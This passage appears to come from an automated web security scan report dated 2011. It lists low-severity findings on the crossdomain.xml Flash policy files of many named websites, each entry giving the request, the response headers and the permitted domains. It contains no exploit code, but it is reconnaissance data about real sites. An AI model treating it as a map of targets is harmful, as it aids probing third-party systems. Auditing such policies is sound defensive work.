Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.bettycrocker.com |
HTTP/1.0 200 OK Cache-Control: max-age=86400 Content-Type: text/xml Last-Modified: Wed, 09 Mar 2011 11:40:50 GMT Accept-Ranges: bytes ETag: "6cc41ad74edecb1:0" Server: Microsoft-IIS/7.0 Content-Length: 226 Date: Sat, 02 Apr 2011 13:45:49 GMT Connection: close ...<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.bettycrocker.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.blastro.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.blastro.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:26:24 GMT Server: Apache/2.2.16 (Unix) Vary: Accept-Encoding Content-Length: 526 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.blastro.com" /> <allow-access-from domain="*.roxwel.com" /> <allow-access-from domain="*.yallwire.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.adxcel.com"/> <allow-access-from domain="*.dev.adxcel.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.blogtv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.blogtv.com |
HTTP/1.1 200 OK Content-Length: 277 Content-Type: text/xml Last-Modified: Sun, 06 Jun 2010 16:19:14 GMT Accept-Ranges: bytes ETag: "879c561945cb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 14:00:23 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.blogtv.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.bluemountain |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.bluemountain.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:05:38 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 18:05:29 GMT ETag: "12590bc-1d4-70484c40" Accept-Ranges: bytes Content-Length: 468 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.beta.americangreetings <allow-access-from domain="*.americangreetings.com" /> <allow-access-from domain="*.bluemountain.com" /> <allow-access-from domain="*.imgag.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.bnet.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.bnet.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:32:30 GMT Server: Apache Accept-Ranges: bytes Content-Length: 1032 Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.builder.com" /> <allow-access-from domain="*.cnet.com" /> <allow-access-from domain="*.*.cnet.com" /> <allow-access-from domain="*.cnettv.com" /> <allow-access-from domain="*.com.com" /> <allow-access-from domain="*.*.com.com" /> <allow-access-from domain="*.download.com" /> <allow-access-from domain="*.gamefaqs.com" /> <allow-access-from domain="*.gamespot.com" /> <allow-access-from domain="*.mysimon.com" /> <allow-access-from domain="*.search.com" /> <allow-access-from domain="*.shopper.com" /> <allow-access-from domain="*.techrepublic.com" /> <allow-access-from domain="*.zdnet.com" /> <allow-access-from domain="*.bnet.com" /> <allow-access-from domain="*.moneywatch.com" /> <allow-access-from domain="*.eyewonder.com" /> <allow-access-from domain="*.eyewonderlabs.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.bodybuilding |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.bodybuilding.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 17 Jan 2007 17:03:00 GMT ETag: "eac1f2-11d-4273f73703900 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:38:17 GMT Content-Length: 285 Connection: close <?xml version="1.0"?> <!-- http://www.bodybuilding <cross-domain-policy> <allow-access-from domain="*.bodybuilders.com" /> <allow-access-from domain="*.bodybuilding.com" /> <allow-access-from domain="*.teenbodybuilding.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.britannica.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.britannica.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:40:31 GMT Server: Apache/2.0.64 (Unix) mod_jk/1.2.31 Last-Modified: Mon, 23 Aug 2010 21:50:25 GMT ETag: "a682f3-469-48e84a2ccca40 Accept-Ranges: bytes Content-Length: 1129 Vary: Accept-Encoding,User MyHeader: web101-b Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.britannica.com"/> <allow-access-from domain="*.eb.com"/> <allow-access-from domain="*.eb.com.au"/> <allow-access-from domain="*.eb.co.uk"/> <allow-access-from domain="*.ebonline.com"/> <allow-access-from domain="*.ebonline.co.nz"/> ...[SNIP]... <allow-access-from domain="redir.adap.tv"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.businessweek |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.businessweek.com |
HTTP/1.0 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.31 benv: nybweb02 bvh: www.businessweek.com Content-Type: application/xml Date: Sat, 02 Apr 2011 13:25:41 GMT Content-Length: 243 Connection: close <?xml version="1.0" encoding="UTF-8"?> <!-- http://www.businessweek <cross-domain-policy> <allow-access-from domain="*.businessweek.com" /> <allow-access-from domain="*.mcgraw-hill.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.buy.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.buy.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Mon, 01 Feb 2010 23:12:53 GMT Accept-Ranges: bytes ETag: "28ddf51494a3ca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Content-Length: 917 Date: Sat, 02 Apr 2011 13:37:44 GMT Connection: close <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="intel.mrmworldwide.com" /> <allow-access-from domain="motifcdn2.doubleclick.net" secure="true" /> <allow-access-from domain="motifcdn.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="ad.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m2.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m3.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m1.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m2.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="ak.buy.com" /> <allow-access-from domain="rss.buy.com" /> <allow-access-from domain="*.llnwd.net" /> <allow-access-from domain="*.buyservices.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cabelas.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cabelas.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Mon, 28 Mar 2011 21:28:32 GMT Content-Type: text/xml Expires: Sat, 02 Apr 2011 13:32:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:32:03 GMT Content-Length: 261 Connection: close <?xml version="1.0"?> <!-- http://www.cabelas.com <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.cabelas.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.canada.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.canada.com |
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/xml; charset=utf-8 Content-Length: 527 Cache-Control: private, max-age=300 Date: Sat, 02 Apr 2011 13:41:16 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.canada.com" /> <allow-access-from domain="*.mavenapps.net" /> <allow-access-from domain="query.mcms.mavenapps.net" /> <allow-access-from domain="*.maventechnologies.com" /> <allow-access-from domain="*.maven.net" /> <allow-access-from domain="www.househunting.ca" /> <allow-access-from domain="*.househunting.ca" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.candystand.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.candystand.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Thu, 24 Mar 2011 20:22:30 GMT ETag: "a10a5-dc-49f403c958d80" Accept-Ranges: bytes Content-Length: 220 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:23:02 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.candystand.com"/> </ ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.caranddriver |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.caranddriver.com |
HTTP/1.0 200 OK Server: Apache/2.2.17 (Unix) DAV/2 PHP/5.2.6 Last-Modified: Tue, 17 Nov 2009 11:36:10 GMT ETag: "69473e-ca-4788f88587e80" Accept-Ranges: bytes Content-Length: 202 Content-Type: application/xml Cache-Control: max-age=60 Date: Sat, 02 Apr 2011 14:03:34 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <cross-domain-policy> <allow-access-from domain="*.hfmus.com" /> <allow-access-from domain="*.caranddriver.com" /> </cross-domain-policy> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.careerbuilder |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.careerbuilder.com |
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml Last-Modified: Wed, 19 Jan 2011 13:51:09 GMT Accept-Ranges: bytes ETag: "d62146eddfb7cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET X-PBY: REBEL14 Date: Sat, 02 Apr 2011 12:42:25 GMT Connection: close Content-Length: 842 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.careerbuilder.com" /> <allow-access-from domain="img.icbdr.com" /> <allow-access-from domain="img.cbdr.com" /> <allow-access-from domain="*.icbdr.com" /> <allow-access-from domain="*.cbdr.com" /> <allow-access-from domain="*.jobbguiden.se" /> <allow-access-from domain="*.jobbingmall.nl" /> <allow-access-from domain="*.careerbuilder.de" /> <allow-access-from domain="*.careerbuilder.no" /> <allow-access-from domain="*.careerbuilder.ch" /> <allow-access-from domain="*.kariera.gr" /> <allow-access-from domain="*.careerbuilder.gr" /> <allow-access-from domain="*.careerbuilder.fr" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.careerrookie |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.careerrookie.com |
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml Last-Modified: Wed, 19 Jan 2011 13:51:09 GMT Accept-Ranges: bytes ETag: "d62146eddfb7cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET X-PBY: BEAR21 Date: Sat, 02 Apr 2011 14:02:26 GMT Connection: close Content-Length: 842 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.careerbuilder.com" /> <allow-access-from domain="img.icbdr.com" /> <allow-access-from domain="img.cbdr.com" /> <allow-access-from domain="*.icbdr.com" /> <allow-access-from domain="*.cbdr.com" /> <allow-access-from domain="*.jobbguiden.se" /> <allow-access-from domain="*.jobbingmall.nl" /> <allow-access-from domain="*.careerbuilder.de" /> <allow-access-from domain="*.careerbuilder.no" /> <allow-access-from domain="*.careerbuilder.ch" /> <allow-access-from domain="*.kariera.gr" /> <allow-access-from domain="*.careerbuilder.gr" /> <allow-access-from domain="*.careerbuilder.fr" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.carnival.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.carnival.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Fri, 28 Jan 2011 19:48:23 GMT Accept-Ranges: bytes ETag: "c4bc715224bfcb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Content-Length: 218 Date: Sat, 02 Apr 2011 13:56:17 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.googlesyndication.com"/><allow-access-from domain="*.feedburner.com"/> </cr ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cars.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cars.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:37:45 GMT Server: IBM_HTTP_Server Last-Modified: Thu, 14 May 2009 14:15:36 GMT ETag: "9c38-27a-f632f200" Accept-Ranges: bytes Content-Length: 634 P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND" Connection: close Content-Type: text/xml Set-Cookie: cars_persist=3980465324 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*.cars.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.2o7.net" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cartoonnetwork |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cartoonnetwork.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:44:47 GMT Server: Apache Last-Modified: Tue, 21 Dec 2010 13:56:44 GMT Content-Length: 11666 Cache-Control: max-age=600 Expires: Sat, 02 Apr 2011 13:40:34 GMT Content-Type: application/xml Connection: close X-Pad: avoid browser bug <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-http-request ...[SNIP]... <allow-access-from domain="*.cartoonnetwork.com" secure="false"/> ...[SNIP]... <allow-access-from domain="cartoonnetwork.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.cartoonnetwork.tv" /> <allow-access-from domain="www.cartoonnetwork.tv" /> <allow-access-from domain="cartoonnetwork.tv" /> <allow-access-from domain="*.cartoonnetwork.us" /> <allow-access-from domain="www.cartoonnetwork.us" /> <allow-access-from domain="cartoonnetwork.us" /> <allow-access-from domain="www.cartoon.co.jp" /> <allow-access-from domain="cartoon.co.jp" /> ...[SNIP]... <allow-access-from domain="www.cartoonnetworkindia <allow-access-from domain="cartoonnetworkindia.com" /> ...[SNIP]... <allow-access-from domain="www.cartoonnetworkasia <allow-access-from domain="cartoonnetworkasia.com" /> <allow-access-from domain="www.adultswim.com.au" /> <allow-access-from domain="adultswim.com.au" /> <allow-access-from domain="www.pogo.tv" /> <allow-access-from domain="pogo.tv" /> <allow-access-from domain="www.cartoonnetworkya.com" /> <allow-access-from domain="cartoonnetworkya.com" /> <allow-access-from domain="www.cartoonnetworkla.com" /> <allow-access-from domain="cartoonnetworkla.com" /> ...[SNIP]... <allow-access-from domain="www.cartoonnetwork.cl" /> <allow-access-from domain="cartoonnetwork.cl" /> <allow-access-from domain="www.adultswimla.com" /> <allow-access-from domain="adultswimla.com" /> <allow-access-from domain="www.adultswim.com.ar" /> <allow-access-from domain="adultswim.com.ar" /> <allow-access-from domain="www.adultswim.cl" /> <allow-access-from domain="adultswim.cl" /> <allow-access-from domain="www.adultswim.com.mx" /> <allow-access-from domain="adultswim.com.mx" /> <allow-access-from domain="www.adultswim.com.ve" /> <allow-access-from domain="adultswim.com.ve" /> <allow-access-from domain="www.adultswim.com.br" /> <allow-access-from domain="adultswim.com.br" /> <allow-access-from domain="www.boomerangla.com" /> <allow-access-from domain="boomerangla.com" /> <allow-access-from domain="www.boomerang.com.mx" /> <allow-access-from domain="boomerang.com.mx" /> <allow-access-from domain="www.boomerang.com.ar" /> <allow-access-from domain="boomerang.com.ar" /> <allow-access-from domain="www.boomerang.com.br" /> <allow-access-from domain="boomerang.com.br" /> <allow-access-from domain="www.boomerang.com.ve" /> <allow-access-from domain="boomerang.com.ve" /> <allow-access-from domain="www.boomerang.cl" /> <allow-access-from domain="boomerang.cl" /> ...[SNIP]... <allow-access-from domain="www.cartoonnetwork.fr" /> <allow-access-from domain="cartoonnetwork.fr" /> <allow-access-from domain="www.cartoonnetwork.es" /> ...[SNIP]... <allow-access-from domain="www.cartoonnetwork.it" /> <allow-access-from domain="cartoonnetwork.it" /> <allow-access-from domain="www.cartoonnetwork.pl" /> <allow-access-from domain="cartoonnetwork.pl" /> <allow-access-from domain="www.cartoonnetwork.nl" /> <allow-access-from domain="cartoonnetwork.nl" /> <allow-access-from domain="www.cartoonnetwork.nu" /> <allow-access-from domain="cartoonnetwork.nu" /> <allow-access-from domain="www.cartoonnetwork.se" /> <allow-access-from domain="cartoonnetwork.se" /> <allow-access-from domain="www.cartoonnetwork.dk" /> <allow-access-from domain="cartoonnetwork.dk" /> <allow-access-from domain="www.cartoonnetwork.ro" /> <allow-access-from domain="cartoonnetwork.ro" /> <allow-access-from domain="www.cartoonnetwork.hu" /> <allow-access-from domain="cartoonnetwork.hu" /> <allow-access-from domain="www.cartoonnetwork.de" /> <allow-access-from domain="cartoonnetwork.hu" /> <allow-access-from domain="www.cartoonnetworkhq.net" /> <allow-access-from domain="cartoonnetworkhq.net" /> <allow-access-from domain="www.cartoonnetworkeurope <allow-access-from domain="cartoonnetworkeurope.com" /> <allow-access-from domain="www.boomerangtv.co.uk" /> <allow-access-from domain="boomerangtv.co.uk" /> <allow-access-from domain="www.boomerangtv.fr" /> <allow-access-from domain="boomerangtv.fr" /> <allow-access-from domain="www.boomerangtv.es" /> <allow-access-from domain="boomerangtv.es" /> <allow-access-from domain="www.toonami.co.uk" /> <allow-access-from domain="toonami.co.uk" /> <allow-access-from domain="aolsvc.cartoonnetwork.kol <allow-access-from domain="kol.cartoonnetwork.com" /> <allow-access-from domain="www.toonamijetstream.com" /> <allow-access-from domain="toonamijetstream.com" /> <allow-access-from domain="*.toonamijetstream.com" /> <allow-access-from domain="www.tickleu.com" /> <allow-access-from domain="tickleu.com" /> <allow-access-from domain="*.tickleu.com" /> <allow-access-from domain="*.adultswim.com" secure="true"/> ...[SNIP]... <allow-access-from domain="www.adultswim.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.adultstage.turner.com" secure="true"/> ...[SNIP]... <allow-access-from domain="adultstage.turner.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.dubitlimited.com" secure="true"/> ...[SNIP]... <allow-access-from domain="otis.turner.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.turner.com" secure="true" /> ...[SNIP]... <allow-access-from domain="staging.cartoonnetwork ...[SNIP]... <allow-access-from domain="aud-ite.cartoonnetwork ...[SNIP]... <allow-access-from domain="mmstage.cartoonnetwork ...[SNIP]... <allow-access-from domain="aud-ite.fusionfall.com" secure="false" /> ...[SNIP]... <allow-access-from domain="audience.cartoonnetwork ...[SNIP]... <allow-access-from domain="topscores.cartoonnetwork ...[SNIP]... <allow-access-from domain="s.cnn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="*.cnn.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.cnn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="ref-avtr.cartoonnetwork ...[SNIP]... <allow-access-from domain="mastercontrol.cartoo <allow-access-from domain="minimatch.cartoonnetwork ...[SNIP]... <allow-access-from domain="gamecreator.cartoonn ...[SNIP]... <allow-access-from domain="gcstage.cartoonnetwork ...[SNIP]... <allow-access-from domain="www.fusionfall.com" /> <allow-access-from domain="staging.fusionfall.com" /> <allow-access-from domain="fusionfall.com" /> <allow-access-from domain="clearspringcnn.blogspot <allow-access-from domain="*.clearspring.com" /> <allow-access-from domain="*.cdn.turner.com" secure="true" /> ...[SNIP]... <allow-access-from domain="ht.cdn.turner.com" secure="true" /> ...[SNIP]... <allow-access-from domain="cnn-0.vo.llnwd.net" secure="true" /> ...[SNIP]... <allow-access-from domain="cnn-1.vo.llnwd.net" secure="true" /> ...[SNIP]... <allow-access-from domain="cnn-2.vo.llnwd.net" secure="true" /> ...[SNIP]... <allow-access-from domain="cnn-3.vo.llnwd.net" secure="true" /> ...[SNIP]... <allow-access-from domain="cnn-4.vo.llnwd.net" secure="true" /> ...[SNIP]... <allow-access-from domain="cnn-5.vo.llnwd.net" secure="true" /> ...[SNIP]... <allow-access-from domain="cnn-6.vo.llnwd.net" secure="true" /> ...[SNIP]... <allow-access-from domain="cnn-7.vo.llnwd.net" secure="true" /> ...[SNIP]... <allow-access-from domain="cnn-8.vo.llnwd.net" secure="true" /> ...[SNIP]... <allow-access-from domain="cnn-9.vo.llnwd.net" secure="true" /> ...[SNIP]... <allow-access-from domain="cnn.vo.llnwd.net" secure="false"/> ...[SNIP]... <allow-access-from domain="http-trd-ak.cdn.turner ...[SNIP]... <allow-access-from domain="http-trd-l3.cdn.turner ...[SNIP]... <allow-access-from domain="teg8devapp1.turner.com" /> <allow-access-from domain="teg8frev1.turner.com" secure="false" /> ...[SNIP]... <allow-access-from domain="www.cryptidsarereal.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cryptidsarereal.com" secure="false"/> ...[SNIP]... <allow-access-from domain="redesign.cartoonnetwork ...[SNIP]... <allow-access-from domain="i.cartoonnetwork.com" secure="false"/> ...[SNIP]... <allow-access-from domain="pollserver.cartoonnetwork ...[SNIP]... <allow-access-from domain="www.addictinggames.com" secure="false"/> ...[SNIP]... <allow-access-from domain="www.miniclip.com" secure="false"/> ...[SNIP]... <allow-access-from domain="www.roblox.com" secure="false"/> ...[SNIP]... <allow-access-from domain="www.wildtangent.com" secure="false"/> ...[SNIP]... <allow-access-from domain="gts.dartmotif.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.cartoonnetwork ...[SNIP]... <allow-access-from domain="*.cn.moxieinteractive.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*nbakidsp1dev1.turner.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.funnygarbage.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.casttv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.casttv.com |
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 02 Apr 2011 13:45:50 GMT Content-Type: text/xml; charset=utf-8 Content-Length: 219 Last-Modified: Tue, 10 Jun 2008 19:51:24 GMT Connection: close Vary: Accept-Encoding Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.casttv.com" /> </c ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cbc.ca |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cbc.ca |
HTTP/1.0 200 OK Server: Apache/2.2.3 (Red Hat) Last-Modified: Thu, 31 Mar 2011 19:58:16 GMT ETag: "cc015-1aa-b6cee600" X-Origin-Server: web23:sb10 Content-Type: text/xml Date: Sat, 02 Apr 2011 14:00:02 GMT Content-Length: 426 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- $Id: cbc.ca-crossdomain.xml 900 2010-01-25 14:26:10Z dunnj $ --> <cross- ...[SNIP]... <allow-access-from domain="*.cbc.ca" /> <allow-access-from domain="*.mavenapps.net"/> <allow-access-from domain="*.cbcmediasales.ca"/> <allow-access-from domain="*.qa.nm.cbc.ca"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cbsnews.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cbsnews.com |
HTTP/1.0 200 OK Server: Apache ETag: "1b334cb-5ef-4889f0a Last-Modified: Wed, 09 Jun 2010 20:49:16 GMT Accept-Ranges: bytes Content-Length: 1519 Content-Type: application/xml Cache-Control: max-age=300 Expires: Sat, 02 Apr 2011 13:29:11 GMT Date: Sat, 02 Apr 2011 13:24:11 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="cbsnews.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.cbsnews.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.cbs.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.*.cbsnews.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.*.cbs.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="www.cbsnew.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="wwwimage.cbsnews.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="cgi.cbsnews.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="video.cgi.cbsnews.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.cbssports.com"/> <allow-access-from domain="*.cbsinteractive.com"/> <allow-access-from domain="*.cnet.com"/> <allow-access-from domain="*.cnettv.com"/> <allow-access-from domain="cgi.cbs.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="video.cgi.cbs.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.*.sportsline.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.cooliris.com" to-ports="*" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.chacha.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.chacha.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: sessionId=MjFhZDhhZm Set-Cookie: sessionId=OTkxNTVhMm Set-Cookie: wuid=NDE0Y2Q4MWYtYjM Set-Cookie: seenUser=dHJ1ZQ%3D%3Do6b4 Set-Cookie: sessionId=MjZhOWMxOD Content-disposition: inline Content-Type: text/xml;charset=UTF-8 Content-Language: en-US Content-Length: 297 Date: Sat, 02 Apr 2011 12:43:28 GMT Connection: close <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.chacha.bz" secure="false"/> <allow-access-from domain="*.chacha.com" secure="false"/> < ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.charlotte |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.charlotteobserver.com |
HTTP/1.0 200 OK Server: Apache/1.3.41 Last-Modified: Thu, 17 Dec 2009 22:05:10 GMT ETag: "ea0d60-df-4b2aab16" Content-Type: application/xml Date: Sat, 02 Apr 2011 13:58:32 GMT Content-Length: 223 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.charlotteobserver.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.chemistry.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.chemistry.com |
HTTP/1.1 200 OK Content-Length: 296 Content-Type: text/xml Last-Modified: Tue, 30 Jan 2007 22:50:53 GMT Accept-Ranges: bytes ETag: "6cb05b18c144c71:53b" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:43:53 GMT Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.chemistry.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.match.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.chevrolet.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.chevrolet.com |
